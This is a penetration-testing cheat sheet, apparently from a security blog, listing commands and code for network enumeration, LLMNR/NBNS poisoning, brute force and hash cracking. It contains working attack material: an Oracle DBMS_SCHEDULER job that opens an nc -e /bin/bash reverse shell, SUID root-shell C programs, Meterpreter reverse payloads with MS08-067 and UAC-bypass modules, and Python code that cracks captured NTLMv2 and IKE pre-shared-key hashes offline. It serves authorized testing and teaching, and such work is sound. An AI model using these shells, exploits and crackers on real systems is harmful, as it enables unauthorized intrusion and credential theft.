Pen Testing Tools Cheat Sheet
highon.coffee/blog/penetration-testing-tools-cheat-sheet
Introduction
Penetration testing tools cheat sheet: a quick reference giving a high level overview of the typical commands used during a penetration testing engagement. For more in depth information I'd recommend the man page for the tool, or a more specific pen testing cheat sheet from the menu on the right.
The focus of this cheat sheet is infrastructure / network penetration testing; web application penetration testing is not covered here apart from a few SQLMap commands at the end and some web server enumeration. For Web Application Penetration Testing, check out The Web Application Hacker's Handbook, it is excellent for both learning and reference.
If I’m missing any pen testing tools here give me a nudge on twitter.
Changelog
16/09/2020 - fixed some formatting issues.
17/02/2017 - Article updated, added loads more content, VPN, DNS tunneling, VLAN hopping etc - check out the TOC below.
Introduction
Changelog
Vulnerability Assessment
BOF / Exploit
Simple Local Web Servers
Mounting File Shares
HTTP / HTTPS Webserver Enumeration
Packet Inspection
Passwords
Wordlists
Windows Penetration Testing Commands
Linux Penetration Testing Commands
Reverse Shells
Meterpreter Cheat Sheet
ASCII Table Cheat Sheet
CISCO IOS Commands
SQLMap Examples
Pre-engagement
Network Configuration
Set IP Address
Subnetting
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
OSINT
DNS
WHOIS enumeration
whois domain-name-here.com
Command Description
nslookup -> set type=any -> ls -d blah.com    Windows DNS zone transfer
Email
Simply Email
Use Simply Email to enumerate all the online places (github, target site etc); it works better if you use proxies or set long throttle times so Google doesn't think you're a robot and make you fill out a Captcha.
Simply Email can verify the discovered email addresses after gathering.
Command Description
Manual HTTP request / banner grab with netcat (type the request by hand, finish with a blank line):
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referer: meh-domain
<enter>
DNS Bruteforce
DNSRecon
DNS Enumeration Kali - DNSRecon
Port Scanning
Nmap Commands
For more commands, see the Nmap cheat sheet (link in the menu on the right).
Command Description
nmap -v -sS -A -T4 target    Nmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p- -A -T4 target    As above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 target    As above but scans all TCP ports and UDP scan (takes even longer)
A few people have asked about the T4 scans; apply common sense here. Don't use T4 on external pen tests (over an Internet connection); you're probably better off with a T2 TCP connect scan. T4 is better suited to an internal pen test over low latency links with plenty of bandwidth. It still depends on the target devices: embedded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan of the top 1000 ports so you can start pen testing, then kick off a slower full scan.
./udp-protocol-scanner.pl -f ip.txt
Other methods of host discovery, that don't use nmap...
Command Description
netdiscover -r 192.168.1.0/24    Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you're on the right VLAN at $client site
Samba Enumeration
SMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Command Description
smbclient -L //192.168.1.100    List shares
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX    Enumerate users via SAMR
RID Cycling:
use auxiliary/scanner/smb/smb_lookupsid
Linux:
smbclient -L //192.168.99.131
NBTScan unixwiz
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
You’ll end up with NTLMv2 hash, use john or hashcat to crack it.
Responder.py
Run Responder.py for the length of the engagement while you're working on other attack
vectors.
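The LLMNR / NBNS poisoning above ends with an NTLMv2 capture that john or hashcat then attack offline. The example below, added here and not code from the cheat sheet, Responder or Metasploit, shows what that capture is: it builds the hashcat -m 5600 line (user::DOMAIN:server_challenge:NTProofStr:blob) from the MS-NLMP derivation and runs the per-candidate check a cracker performs against it. The user, domain, password, challenges and AV pair are constructed sample values, and the function names are this example's own. MD4 is implemented inline because hashlib's md4 is frequently unavailable under OpenSSL 3.

```python
# Added worked example: NTLMv2 capture format and offline candidate check.
# All keys, challenges and AV pairs below are constructed sample data.
import hmac
import struct


def md4(data):
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    m = 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rol = lambda x, s: ((x << s) | (x >> (32 - s))) & m
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a = rol((a + f(b, c, d) + x[i]) & m, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = rol((a + g(b, c, d) + x[k] + 0x5A827999) & m, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = rol((a + h(b, c, d) + x[k] + 0x6ED9EBA1) & m, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & m, (b + bb) & m, (c + cc) & m, (d + dd) & m
    return struct.pack("<4I", a, b, c, d)


def ntlmv2_proof(password, user, domain, server_challenge, blob):
    """NTProofStr (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NTLMv2 hash over
    server_challenge || blob. NTLMv2 hash = HMAC-MD5(NT hash, UPPER(user) || domain),
    NT hash = MD4(UTF-16LE password). Note the domain is not upper-cased."""
    nt_hash = md4(password.encode("utf-16le"))
    ntlmv2_hash = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16le"), "md5").digest()
    return hmac.new(ntlmv2_hash, server_challenge + blob, "md5").digest()


def build_blob(timestamp, client_challenge, target_info):
    """NTLMv2_CLIENT_CHALLENGE: RespType 1, HiRespType 1, 6 reserved bytes, FILETIME
    timestamp, 8-byte client challenge, 4 reserved, AV pairs, 4 trailing zero bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def hashcat_5600_line(user, domain, server_challenge, proof, blob):
    """The line Responder / the Metasploit capture modules log, ready for hashcat -m 5600."""
    return "%s::%s:%s:%s:%s" % (user, domain, server_challenge.hex(), proof.hex(), blob.hex())


def check_candidates(line, candidates):
    """What john / hashcat do per wordlist entry: recompute NTProofStr, compare.
    Returns the matching password or None."""
    user, _, rest = line.partition("::")
    domain, chal_hex, proof_hex, blob_hex = rest.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for pw in candidates:
        if hmac.compare_digest(ntlmv2_proof(pw, user, domain, chal, blob), proof):
            return pw
    return None


# Constructed sample capture (not real traffic): user jsmith in domain CORP with
# password Summer2017!, a server challenge picked by the rogue SMB server, and a
# minimal target-info block holding one NetBIOS domain AV pair (id 2) and the terminator.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
TARGET_INFO = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16le") + struct.pack("<HH", 0, 0)
SAMPLE_BLOB = build_blob(0x01D2A0B0C0D0E0F0, bytes.fromhex("aabbccddeeff0011"), TARGET_INFO)
SAMPLE_LINE = hashcat_5600_line(
    "jsmith", "CORP", SERVER_CHALLENGE,
    ntlmv2_proof("Summer2017!", "jsmith", "CORP", SERVER_CHALLENGE, SAMPLE_BLOB), SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(check_candidates(SAMPLE_LINE, ["password", "Winter2017!", "Summer2017!"]))
```

The captured value is not a password hash you can replay: NTProofStr is an HMAC over a challenge the rogue server chose, so the only offline option is guessing candidates, which is why the quality of the wordlist decides the outcome. Relaying the authentication with ntlmrelayx before it completes is the alternative when cracking is too slow, but that is outside this cheat sheet.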
Command Description
snmpcheck -t 192.168.1.X -c public    SNMP enumeration
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d" " -f4    Enumerate running processes via SNMP (Host Resources MIB hrSWRunName)
snmpenum -t 192.168.1.X    SNMP enumeration
Rory McCune's snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt    Metasploit's default SNMP community string wordlist
R Services Enumeration
nmap -A will perform all the rservices enumeration listed below, this section has been added
for completeness or manual confirmation:
RSH Enumeration
RSH Run Commands
auxiliary/scanner/rservices/rsh_login
Finger Enumeration
finger @TARGET-IP
finger batman@TARGET-IP
finger 0@host
rwho
testssl.sh
Test all the things on a single host and output to a .html file:
Vulnerability Assessment
Install OpenVAS 8 on Kali Rolling:
apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup
netstat -tulpn
Oracle
Install oscanner:
Run oscanner:
Install tnscmd10g:
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Requirements:
In the example below the user SCOTT is used but this should be possible with another
default Oracle account.
nmap --script=oracle-sid-brute
nmap --script=oracle-brute
Login using the identified weak account (assuming you find one).
You should have a DBA user with creds user1 and pass1.
Verify you have DBA privileges by re-running the first command again.
Remove the exploit using:
Reverse shell via DBMS_SCHEDULER (needs the CREATE EXTERNAL JOB privilege, which the DBA account above has; the nc on the database host must support -e). Start a listener on TARGET-IP port 443 first, e.g. nc -l -p 443. The job name has to match in every call; the block originally mixed two names, which fails:
begin
dbms_scheduler.create_job( job_name => 'rev_shell',job_type => 'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date => SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell');
end;
/
MSSQL
Enumeration / Discovery:
Nmap:
Metasploit:
Network
Plink.exe Tunnel
PuTTY Link tunnel
Pivoting
SSH Pivoting
Meterpreter Pivoting
TTL fingerprinting, default TTL by operating system:
Windows 128
Linux 64
Solaris 255
Classful IP Ranges
Class IP Address Range
127.0.0.0 - 127.255.255.255
Subnet cheat sheet, not really related to pen testing but a useful reference.
CIDR Decimal Mask Number of Hosts
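The subnet table and the ipcalc commands in the Subnetting section, worked as code. This is an added example, not part of the original cheat sheet: it uses Python's standard ipaddress module to compute what ipcalc prints, and the names subnet_info, cidr_table and in_scope, plus the sample addresses, are this example's own.

```python
# Added worked example: what ipcalc and the subnet table give you, standard library only.
# The addresses used are constructed sample input.
import ipaddress


def subnet_info(cidr):
    """Network, broadcast, mask and usable host count for an address/prefix.

    strict=False accepts a host address such as 192.168.1.37/24 and returns the
    enclosing network, which is what ipcalc does with the same input.
    """
    net = ipaddress.ip_network(cidr, strict=False)
    if net.prefixlen >= net.max_prefixlen - 1:
        usable = net.num_addresses      # /31 (RFC 3021) and /32: every address is a host
    else:
        usable = net.num_addresses - 2  # drop the network and broadcast addresses
    return {
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "netmask": str(net.netmask),
        "wildcard": str(net.hostmask),
        "prefixlen": net.prefixlen,
        "hosts": usable,
    }


def cidr_table(first=16, last=30):
    """Rows of (CIDR, decimal mask, usable hosts): the subnet cheat sheet as data."""
    rows = []
    for plen in range(first, last + 1):
        info = subnet_info("0.0.0.0/%d" % plen)
        rows.append(("/%d" % plen, info["netmask"], info["hosts"]))
    return rows


def in_scope(address, scope_cidrs):
    """True if the address lies inside one of the agreed target ranges. Worth checking
    before attacking a host found by ARP or ping sweep: VLANs are often larger than
    the client described, and hits outside the agreed CIDRs are out of scope."""
    ip = ipaddress.ip_address(address)
    return any(ip in ipaddress.ip_network(c, strict=False) for c in scope_cidrs)


if __name__ == "__main__":
    print(subnet_info("192.168.1.37/24"))
    for row in cidr_table(24, 26):
        print("%-5s %-16s %d" % row)
    print(in_scope("10.10.5.200", ["10.10.4.0/23"]))   # a /23 spans 10.10.4.0 - 10.10.5.255
```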
VLAN Hopping
Using NCC Group's VLAN wrapper script for Yersinia simplifies the process.
IKEForce
Install:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
3. Use ike-scan to capture the PSK hash from the IKE endpoint
4. Use psk-crack to crack the hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IP-key    Brute force PSKs up to 5 characters against the parameters saved by ike-scan -P
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key    Same, with an explicit alphanumeric character set
psk-crack -d /path/to/dictionary-file TARGET-IP-key
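What psk-crack is doing with that file, as an added example that is not the cheat sheet's, ike-scan's or psk-crack's own code. Aggressive mode sends HASH_R in the clear, and HASH_R is only an HMAC chain over values that are all visible on the wire except the PSK, so each dictionary word can be tested offline with the RFC 2409 derivation below. The field order used for the psk-crack file, g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r, follows the ike-scan documentation and is an assumption of this example; every field value below is constructed, not a real capture, and the function names are this example's own.

```python
# Added worked example: RFC 2409 aggressive-mode PSK derivation, as psk-crack
# recomputes it per dictionary word. Field layout of the psk-crack line is assumed
# from the ike-scan docs; all sample values are constructed, not captured.
import hashlib
import hmac

PRF_BY_NAME = {"md5": hashlib.md5, "sha1": hashlib.sha1}
PRF_BY_HASH_LEN = {16: "md5", 20: "sha1"}


def ike_hash_r(psk, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b, prf="sha1"):
    """HASH_R for pre-shared key authentication (RFC 2409 section 5.4):
         SKEYID = prf(pre-shared-key, Ni_b | Nr_b)
         HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    with prf = HMAC of the negotiated hash (MD5 or SHA1)."""
    digest = PRF_BY_NAME[prf]
    skeyid = hmac.new(psk, ni_b + nr_b, digest).digest()
    return hmac.new(skeyid, g_xr + g_xi + cky_r + cky_i + sai_b + idir_b, digest).digest()


def parse_psk_line(line):
    """Split one psk-crack line into its nine raw byte fields."""
    fields = [bytes.fromhex(f) for f in line.strip().split(":")]
    if len(fields) != 9:
        raise ValueError("expected 9 colon-separated hex fields, got %d" % len(fields))
    return fields


def crack_psk_line(line, wordlist, prf=None):
    """Dictionary attack on one psk-crack line; returns the PSK or None.
    The PRF is inferred from the HASH_R length (16 = MD5, 20 = SHA1) unless given."""
    *params, hash_r = parse_psk_line(line)
    prf = prf or PRF_BY_HASH_LEN[len(hash_r)]
    for word in wordlist:
        if hmac.compare_digest(ike_hash_r(word.encode(), *params, prf=prf), hash_r):
            return word
    return None


def _fill(n, label):
    """Deterministic filler bytes for the constructed sample (not real IKE values)."""
    out = b""
    while len(out) < n:
        out += hashlib.sha256(label.encode() + bytes([len(out) // 32])).digest()
    return out[:n]


def make_sample_line(psk, prf="sha1"):
    """Constructed capture for an endpoint whose PSK is `psk`: 1024-bit DH group 2
    public values, 8-byte cookies, an SA payload body, the responder's IPv4 ID
    (type 1, UDP/500, 203.0.113.10 from the documentation range) and 20-byte nonces."""
    g_xr, g_xi = _fill(128, "g_xr"), _fill(128, "g_xi")
    cky_r, cky_i = _fill(8, "cky_r"), _fill(8, "cky_i")
    sai_b = _fill(52, "sai_b")
    idir_b = bytes([1, 17, 0x01, 0xF4]) + bytes([203, 0, 113, 10])
    ni_b, nr_b = _fill(20, "ni_b"), _fill(20, "nr_b")
    params = [g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b]
    hash_r = ike_hash_r(psk.encode(), *params, prf=prf)
    return ":".join(p.hex() for p in params + [hash_r])


if __name__ == "__main__":
    line = make_sample_line("vpnsecret")
    print(line)
    print(crack_psk_line(line, ["admin", "cisco", "vpnsecret"]))
```

The same derivation is why a long random PSK defeats the attack while a dictionary word or a short brute-forceable string does not: nothing in the exchange rate-limits guesses once HASH_R has been captured.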
PPTP Hacking
DNS Tunneling
Tunneling data over DNS to bypass firewalls.
dnscat2 supports “download” and “upload” commands for getting files (data and programs) to
and from the target machine.
Attacking Machine
Installation:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Run dnscat2:
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
BOF / Exploit
Exploit Research
Find exploits for enumerated hosts / services.
Command Description
searchsploit windows 2003 | grep -i local    Search exploit-db for exploit, in this example windows 2003 + local esc
searchsploit -u    Update the local exploit-db copy
searchsploit apache 2.2
searchsploit "Linux Kernel"
searchsploit linux 2.6 | grep -i ubuntu | grep local
Compiling Windows Exploits on Kali
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe
Exploiting Shellshock
nc -l -p 443
Mounting File Shares
Command Description
apt-get install smb4k -y    Install smb4k on Kali, useful Linux GUI for browsing SMB shares
HTTP / HTTPS Webserver Enumeration
Command Description
nikto -h 192.168.1.1    Perform a nikto scan against target
dirbuster    Configure via GUI, CLI input doesn't work most of the time
Packet Inspection
Command Description
tcpdump tcp port 80 -w output.pcap -i eth0    tcpdump for port 80 on interface eth0, outputs to output.pcap
Username Enumeration
Some techniques used to remotely enumerate users on a target system.
Command Description
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX    Enumerate users from SMB
snmpwalk -c public -v1 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4    Enumerate users from SNMP (the 77.1.2.25 OID is the LanManager user table)
nmap -sT -p 161 192.168.X.XXX/24 -oG snmp_results.txt (then grep)    Search for SNMP servers with nmap, grepable output
Passwords
Wordlists
Command Description
/usr/share/wordlists    Kali word lists
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V    Hydra FTP brute force
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V    Hydra POP3 brute force
hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V    Hydra SMTP brute force
Password Cracking
Password cracking penetration testing tools.
Command Description
john --wordlist=/usr/share/wordlists/rockyou.txt hashes    JTR password cracking
Compiling Exploits
Some notes on compiling exploits.
Command Description
process.h, string.h, winbase.h, windows.h, winsock2.h    Windows exploit code headers
Compile exploit with gcc:
gcc -o exploit exploit.c    Basic GCC compile
gcc -m32 exploit.c -o exploit    Cross compile 32 bit binary on 64 bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe    Compile windows .exe on Linux
SUID Binary
Often SUID C binary files are required to spawn a shell as a superuser; you can update the UID / GID and shell as required.
Below are some quick copy and paste examples for various shells:
#define _GNU_SOURCE   /* glibc only declares setresuid() with this defined */
#include <stdlib.h>
#include <unistd.h>
/* set real, effective and saved UID to 0: bash drops an effective UID that differs from the real one (unless run with -p), so the SUID bit alone is not enough */
int main(void){
    setresuid(0, 0, 0);
    system("/bin/bash");
}
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
int main(void){
    setresuid(0, 0, 0);
    system("/bin/sh");
}
Building the SUID Shell binary
For 32 bit:
Reverse Shells
See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.
TTY Shells
Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.
Python (inside an interactive interpreter): echo os.system('/bin/bash')
sh: /bin/sh -i
Perl: exec "/bin/sh";
Perl one-liner: perl -e 'exec "/bin/sh";'
Ruby: exec "/bin/sh"
Lua: os.execute('/bin/sh')
vi: :!bash
nmap interactive mode: !sh
Meterpreter Cheat Sheet
Basic Metasploit commands, useful for reference; for pivoting see the Meterpreter Pivoting techniques above.
Meterpreter Payloads
Command Description
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload
Command Description
set payload windows/vncinject/reverse_tcp Meterpreter Windows VNC Payload
set ViewOnly false
Command Description
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload
Command Description
upload file c:\\windows Meterpreter upload file to Windows target
Command Description
portfwd add -l 3389 -p 3389 -r target    Meterpreter create port forward to target machine
Command Description
use exploit/windows/smb/ms08_067_netapi    MS08_067 Windows 2k, XP, 2003 Remote Exploit
Command Description
use exploit/windows/local/bypassuac    Bypass UAC on Windows 7 + Set target + arch, x86/64
Command Description
use exploit/multi/script/web_delivery    Metasploit powershell payload delivery module
Command Description
run post/windows/gather/win_privs    Metasploit show privileges of current user
ASCII Table Cheat Sheet
Hex  Char   Hex  Char   Hex  Char   Hex  Char
x08  BS     x09  TAB    x0a  LF     x0d  CR
x1b  ESC    x20  SPC    x21  !      x22  "
x23  #      x24  $      x25  %      x26  &
x27  '      x28  (      x29  )      x2a  *
x2b  +      x2c  ,      x2d  -      x2e  .
x2f  /      x30  0      x31  1      x32  2
x33  3      x34  4      x35  5      x36  6
x37  7      x38  8      x39  9      x3a  :
x3b  ;      x3c  <      x3d  =      x3e  >
x3f  ?      x40  @      x41  A      x42  B
x43  C      x44  D      x45  E      x46  F
x47  G      x48  H      x49  I      x4a  J
x4b  K      x4c  L      x4d  M      x4e  N
x4f  O      x50  P      x51  Q      x52  R
x53  S      x54  T      x55  U      x56  V
x57  W      x58  X      x59  Y      x5a  Z
x5b  [      x5c  \      x5d  ]      x5e  ^
x5f  _      x60  `      x61  a      x62  b
x63  c      x64  d      x65  e      x66  f
x67  g      x68  h      x69  i      x6a  j
x6b  k      x6c  l      x6d  m      x6e  n
x6f  o      x70  p      x71  q      x72  r
x73  s      x74  t      x75  u      x76  v
x77  w      x78  x      x79  y      x7a  z
CISCO IOS Commands
Command Description
enable    Enters enable mode
Cryptography
Hash Lengths
Hash Size
Hash Examples
Likely just use hash-identifier for this but here are some example hashes:
Hash Example
SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
SQLMap Examples
A mini SQLMap cheat sheet:
Command Description
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3    Automated sqlmap scan